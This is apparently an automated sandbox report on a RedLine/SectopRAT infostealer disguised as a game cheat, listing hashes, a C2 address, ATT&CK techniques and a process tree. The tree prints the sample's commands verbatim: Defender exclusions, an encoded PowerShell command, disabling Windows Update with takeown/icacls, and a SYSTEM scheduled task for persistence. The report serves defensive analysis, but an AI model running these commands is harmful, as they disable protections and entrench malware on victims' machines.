redline | ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Analysis

max time kernel
149s
max time network
141s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 11:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Size

7.3MB
MD5

06293c3726a8b6029225668dcfb8c7e8
SHA1

1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512

33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP

196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr

Score

10^/10

redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Lucifer

162.55.169.73:49194

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000173a9-11.dat	family_redline
behavioral1/memory/2852-31-0x0000000000C20000-0x0000000000C3E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000173a9-11.dat	family_sectoprat
behavioral1/memory/2852-31-0x0000000000C20000-0x0000000000C3E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2344	powershell.exe
288	powershell.exe
1580	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1356	icacls.exe
2888	takeown.exe
2636	takeown.exe
1692	icacls.exe
2024	icacls.exe
1948	takeown.exe
2716	icacls.exe
1764	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 7 IoCs

pid	Process
2816	svchost.exe
2260	svchost.exe
2772	windowshost.exe
2852	explorer.exe
1804	cominto.exe
1168	updater.exe
1352	updater.exe

Loads dropped DLL 7 IoCs

pid	Process
2076	cmd.exe
2052	cmd.exe
2280	cmd.exe
2300	cmd.exe
1600	cmd.exe
1600	cmd.exe
468	cmd.exe

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2888	takeown.exe
1692	icacls.exe
2024	icacls.exe
1948	takeown.exe
2716	icacls.exe
1764	takeown.exe
1356	icacls.exe
2636	takeown.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 20 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2724	powercfg.exe
556	cmd.exe
2664	powercfg.exe
768	powercfg.exe
2604	powercfg.exe
960	cmd.exe
2736	powercfg.exe
2280	powercfg.exe
2840	powercfg.exe
2104	powercfg.exe
2704	powercfg.exe
1600	powercfg.exe
1684	powercfg.exe
1652	cmd.exe
1036	powercfg.exe
2132	powercfg.exe
1748	powercfg.exe
2004	powercfg.exe
2812	cmd.exe
1188	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2608 set thread context of 2556	2608	conhost.exe	86
PID 2868 set thread context of 784	2868	conhost.exe	88
PID 1632 set thread context of 1780	1632	conhost.exe	186
PID 2116 set thread context of 2232	2116	conhost.exe	196

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 60 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2600	sc.exe
2388	sc.exe
2288	sc.exe
1624	sc.exe
2620	sc.exe
2740	sc.exe
2816	sc.exe
1736	sc.exe
1728	sc.exe
2472	sc.exe
2788	sc.exe
2832	sc.exe
944	sc.exe
1008	sc.exe
2676	sc.exe
576	sc.exe
2692	sc.exe
2756	sc.exe
3060	sc.exe
2112	sc.exe
2344	sc.exe
1320	sc.exe
444	sc.exe
2752	sc.exe
1984	sc.exe
2616	sc.exe
1152	sc.exe
1640	sc.exe
628	sc.exe
1168	sc.exe
1340	sc.exe
1088	sc.exe
1784	sc.exe
2780	sc.exe
864	sc.exe
2216	sc.exe
112	sc.exe
2768	sc.exe
2024	sc.exe
2028	sc.exe
2512	sc.exe
2908	sc.exe
112	sc.exe
1840	sc.exe
2532	sc.exe
1032	sc.exe
1772	sc.exe
880	sc.exe
2560	sc.exe
1004	sc.exe
2264	sc.exe
2252	sc.exe
1992	sc.exe
2088	sc.exe
1524	sc.exe
2292	sc.exe
860	sc.exe
2108	sc.exe
2668	sc.exe
496	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windowshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2772	schtasks.exe
604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2344	powershell.exe
1580	powershell.exe
288	powershell.exe
2376	powershell.exe
1948	powershell.exe
2608	conhost.exe
2868	conhost.exe
3012	powershell.exe
2912	powershell.exe
1632	conhost.exe
2116	conhost.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	2852	explorer.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	1804	cominto.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeShutdownPrivilege	2104	powercfg.exe
Token: SeShutdownPrivilege	1188	powercfg.exe
Token: SeShutdownPrivilege	2132	powercfg.exe
Token: SeDebugPrivilege	2608	conhost.exe
Token: SeShutdownPrivilege	2704	powercfg.exe
Token: SeShutdownPrivilege	2280	powercfg.exe
Token: SeDebugPrivilege	2868	conhost.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	2724	powercfg.exe
Token: SeShutdownPrivilege	2736	powercfg.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	1632	conhost.exe
Token: SeShutdownPrivilege	2664	powercfg.exe
Token: SeShutdownPrivilege	2004	powercfg.exe
Token: SeDebugPrivilege	2116	conhost.exe
Token: SeShutdownPrivilege	2840	powercfg.exe
Token: SeShutdownPrivilege	1036	powercfg.exe
Token: SeShutdownPrivilege	1600	powercfg.exe
Token: SeShutdownPrivilege	768	powercfg.exe
Token: SeShutdownPrivilege	2604	powercfg.exe
Token: SeShutdownPrivilege	1684	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2548	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	30
PID 2380 wrote to memory of 2548	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	30
PID 2380 wrote to memory of 2548	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	30
PID 2380 wrote to memory of 2548	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	30
PID 2380 wrote to memory of 2552	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	31
PID 2380 wrote to memory of 2552	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	31
PID 2380 wrote to memory of 2552	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	31
PID 2380 wrote to memory of 2552	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	31
PID 2380 wrote to memory of 2076	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	32
PID 2380 wrote to memory of 2076	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	32
PID 2380 wrote to memory of 2076	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	32
PID 2380 wrote to memory of 2076	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	32
PID 2380 wrote to memory of 2052	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	35
PID 2380 wrote to memory of 2052	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	35
PID 2380 wrote to memory of 2052	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	35
PID 2380 wrote to memory of 2052	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	35
PID 2380 wrote to memory of 2280	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	37
PID 2380 wrote to memory of 2280	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	37
PID 2380 wrote to memory of 2280	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	37
PID 2380 wrote to memory of 2280	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	37
PID 2380 wrote to memory of 2300	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	38
PID 2380 wrote to memory of 2300	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	38
PID 2380 wrote to memory of 2300	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	38
PID 2380 wrote to memory of 2300	2380	1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe	38
PID 2548 wrote to memory of 1580	2548	cmd.exe	42
PID 2548 wrote to memory of 1580	2548	cmd.exe	42
PID 2548 wrote to memory of 1580	2548	cmd.exe	42
PID 2548 wrote to memory of 1580	2548	cmd.exe	42
PID 2552 wrote to memory of 2344	2552	cmd.exe	43
PID 2552 wrote to memory of 2344	2552	cmd.exe	43
PID 2552 wrote to memory of 2344	2552	cmd.exe	43
PID 2552 wrote to memory of 2344	2552	cmd.exe	43
PID 2076 wrote to memory of 2260	2076	cmd.exe	44
PID 2076 wrote to memory of 2260	2076	cmd.exe	44
PID 2076 wrote to memory of 2260	2076	cmd.exe	44
PID 2076 wrote to memory of 2260	2076	cmd.exe	44
PID 2052 wrote to memory of 2816	2052	cmd.exe	45
PID 2052 wrote to memory of 2816	2052	cmd.exe	45
PID 2052 wrote to memory of 2816	2052	cmd.exe	45
PID 2052 wrote to memory of 2816	2052	cmd.exe	45
PID 2280 wrote to memory of 2852	2280	cmd.exe	46
PID 2280 wrote to memory of 2852	2280	cmd.exe	46
PID 2280 wrote to memory of 2852	2280	cmd.exe	46
PID 2280 wrote to memory of 2852	2280	cmd.exe	46
PID 2300 wrote to memory of 2772	2300	cmd.exe	47
PID 2300 wrote to memory of 2772	2300	cmd.exe	47
PID 2300 wrote to memory of 2772	2300	cmd.exe	47
PID 2300 wrote to memory of 2772	2300	cmd.exe	47
PID 2772 wrote to memory of 2888	2772	windowshost.exe	49
PID 2772 wrote to memory of 2888	2772	windowshost.exe	49
PID 2772 wrote to memory of 2888	2772	windowshost.exe	49
PID 2772 wrote to memory of 2888	2772	windowshost.exe	49
PID 2552 wrote to memory of 288	2552	cmd.exe	50
PID 2552 wrote to memory of 288	2552	cmd.exe	50
PID 2552 wrote to memory of 288	2552	cmd.exe	50
PID 2552 wrote to memory of 288	2552	cmd.exe	50
PID 2888 wrote to memory of 1600	2888	WScript.exe	51
PID 2888 wrote to memory of 1600	2888	WScript.exe	51
PID 2888 wrote to memory of 1600	2888	WScript.exe	51
PID 2888 wrote to memory of 1600	2888	WScript.exe	51
PID 1600 wrote to memory of 1804	1600	cmd.exe	53
PID 1600 wrote to memory of 1804	1600	cmd.exe	53
PID 1600 wrote to memory of 1804	1600	cmd.exe	53
PID 1600 wrote to memory of 1804	1600	cmd.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Executes dropped EXE
    PID:2260
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        5⤵
        
        PID:2404
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:2584
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1984
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:2216
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2252
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2472
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2388
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:2560
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1624
      - C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        6⤵
        Launches sc.exe
        
        PID:880
      - C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2668
      - C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2788
      - C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2740
      - C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2908
      - C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1340
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:1320
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2292
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2636
      - C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1692
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        6⤵
        
        PID:1048
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        6⤵
        
        PID:1500
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        6⤵
        
        PID:600
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        6⤵
        
        PID:1740
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        6⤵
        
        PID:1864
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        6⤵
        
        PID:1600
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        6⤵
        
        PID:2260
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        6⤵
        
        PID:2136
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        6⤵
        
        PID:620
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        6⤵
        
        PID:1000
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        6⤵
        
        PID:1544
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        6⤵
        
        PID:1736
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:960
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1188
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
    - - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        5⤵
        Drops file in Windows directory
        
        PID:2556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        
        PID:2792
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        Loads dropped DLL
        
        PID:468
      - C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        6⤵
        Executes dropped EXE
        
        PID:1168
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\System32\cmd.exe
        
